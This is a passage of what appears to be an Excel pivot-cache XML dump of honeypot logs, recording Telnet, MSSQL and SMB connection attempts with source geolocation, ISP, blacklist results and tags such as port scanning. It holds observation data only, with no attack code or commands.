    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6776:be04"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1032"/>
    <x v="1032"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:30:31"/>
    <d v="2025-04-23T12:56:44"/>
    <d v="2025-04-23T13:30:31"/>
    <n v="45"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.18362"/>
    <s v="106.825"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2005-09-02"/>
    <s v="TLKM_D2_BB_SPEEDY_GB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7da1:4da0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1033"/>
    <x v="1033"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:26:41"/>
    <d v="2025-04-23T13:26:41"/>
    <d v="2025-04-23T13:26:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Palakkad"/>
    <s v="Cherpulassery"/>
    <s v="8504418"/>
    <s v="NA"/>
    <s v="10.8765"/>
    <s v="76.3093"/>
    <s v="138754"/>
    <s v="KVBPL-AS-IN"/>
    <s v="Kerala Communicators Cable Limited"/>
    <s v="consumer"/>
    <s v="Kerala Communicators Cable Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:893b:5798"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1034"/>
    <x v="1034"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:19:29"/>
    <d v="2025-04-06T14:54:11"/>
    <d v="2025-04-23T13:19:29"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H43&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Jagnath Plot)"/>
    <s v="1258847"/>
    <s v="360004"/>
    <s v="22.2934"/>
    <s v="70.7906"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="INPL's"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="ISHAN-NETSOL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b36:b299"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1035"/>
    <x v="1035"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:19:10"/>
    <d v="2024-09-04T06:41:00"/>
    <d v="2025-04-23T13:19:10"/>
    <n v="614"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;37410&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KG"/>
    <s v="Kyrgyzstan"/>
    <s v="GB"/>
    <s v="Bishkek"/>
    <s v="NA"/>
    <s v="Bishkek"/>
    <s v="1528675"/>
    <s v="NA"/>
    <s v="42.8746"/>
    <s v="74.5698"/>
    <s v="8449"/>
    <s v="ElCat Ltd."/>
    <s v="ElCat Ltd."/>
    <s v="business"/>
    <s v="Elcat"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (5.57.8.235,61935)}&amp;&amp;{Data_SMB:Incoming connection (5.57.8.235,56061)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:539:8eb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1036"/>
    <x v="1036"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:02:05"/>
    <d v="2024-03-14T02:53:32"/>
    <d v="2025-04-23T13:02:05"/>
    <n v="243"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H36"/>
    <s v="445&amp;&amp;1433&amp;&amp;48752&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="181"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ET"/>
    <s v="Ethiopia"/>
    <s v="AA"/>
    <s v="Addis Ababa"/>
    <s v="NA"/>
    <s v="Addis Ababa"/>
    <s v="344979"/>
    <s v="NA"/>
    <s v="9.02497"/>
    <s v="38.7469"/>
    <s v="24757"/>
    <s v="EthioNet"/>
    <s v="Ethiotelecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,1376)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,22080)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,25369)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,23953)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,2874)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,10299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,46107)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,38118)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,55753)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,62963)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,12148)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,41952)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,42933)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,14103)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,64486)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,24582)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,11260)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,29305)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,29241)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,48073)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,27735)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,19780)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,21013)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,245)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,31404)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,4700)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,50752)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,12027)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,37684)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,38917)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,44303)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,5998)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,31890)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,37544)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,62592)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,52291)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,53743)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,13580)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,19215)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,19414)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,26349)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,51023)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,63228)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,20666)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,27664)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,33981)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,49768)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,50058)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,50550)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,36753)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,13084)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,16795)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,35641)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,35753)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,48425)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4bc:33f4"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1037"/>
    <x v="1037"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:38:08"/>
    <d v="2025-04-23T12:38:08"/>
    <d v="2025-04-23T12:38:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7448:3cb2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1038"/>
    <x v="1038"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:37:11"/>
    <d v="2025-01-21T06:36:16"/>
    <d v="2025-04-23T12:37:11"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.23003"/>
    <s v="106.799"/>
    <s v="58369"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="residential"/>
    <s v="PT Moores Rowland Indonesia"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6729:fae7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1039"/>
    <x v="1039"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:36:29"/>
    <d v="2025-01-17T01:03:40"/>
    <d v="2025-04-23T12:36:29"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tajrīsh (District 1)"/>
    <s v="113514"/>
    <s v="NA"/>
    <s v="35.7952"/>
    <s v="51.4323"/>
    <s v="16322"/>
    <s v="Parsan Lin Co. PJS"/>
    <s v="Dadeh Gostar Asr Novin P.J.S. Co"/>
    <s v="business"/>
    <s v="Dadeh Gostar Asr Novin P.J.S. Co."/>
    <s v="2011-03-04"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2ea7:98c0"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1040"/>
    <x v="1040"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:35:24"/>
    <d v="2025-04-23T12:35:24"/>
    <d v="2025-04-23T12:35:24"/>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d6:48d6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1041"/>
    <x v="1041"/>
    <s v="114-32-60-185.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:29:36"/>
    <d v="2025-01-19T22:21:34"/>
    <d v="2025-04-23T12:29:36"/>
    <n v="185"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="23"/>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
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:3cb9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="Port Scanning"/>
  </r>
  <r>
    <x v="1042"/>
    <x v="1042"/>
    <s v="77-85-130-59.ip.btc-net.bg&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:28:03"/>
    <d v="2025-03-22T18:54:57"/>
    <d v="2025-04-23T12:28:03"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="113"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="22"/>
    <s v="Sofia-grad"/>
    <s v="Sofia"/>
    <s v="Sofia"/>
    <s v="727011"/>
    <s v="1000"/>
    <s v="42.6975"/>
    <s v="23.3242"/>
    <s v="8866"/>
    <s v="Vivacom Bulgaria EAD"/>
    <s v="Vivacom Bulgaria EAD"/>
    <s v="residential"/>
    <s v="BTC-BROADBAND"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4d55:823b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="1043"/>
    <x v="1043"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:27:04"/>
    <d v="2025-04-23T12:25:43"/>
    <d v="2025-04-23T12:27:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:95bc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="1044"/>
    <x v="1044"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:14:37"/>
    <d v="2025-04-11T07:44:17"/>
    <d v="2025-04-23T12:14:37"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="NA"/>
    <s v="Teluknaga"/>
    <s v="1990589"/>
    <s v="NA"/>
    <s v="-6.09889"/>
    <s v="106.638"/>
    <s v="58369"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="residential"/>
    <s v="PT Moores Rowland Indonesia"/>
    <s v="2022-11-21"/>
    <s v="IDNIC-MOORESROWLAND-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6729:fbc5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1045"/>
    <x v="1045"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:09:55"/>
    <d v="2025-04-23T12:08:09"/>
    <d v="2025-04-23T12:09:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
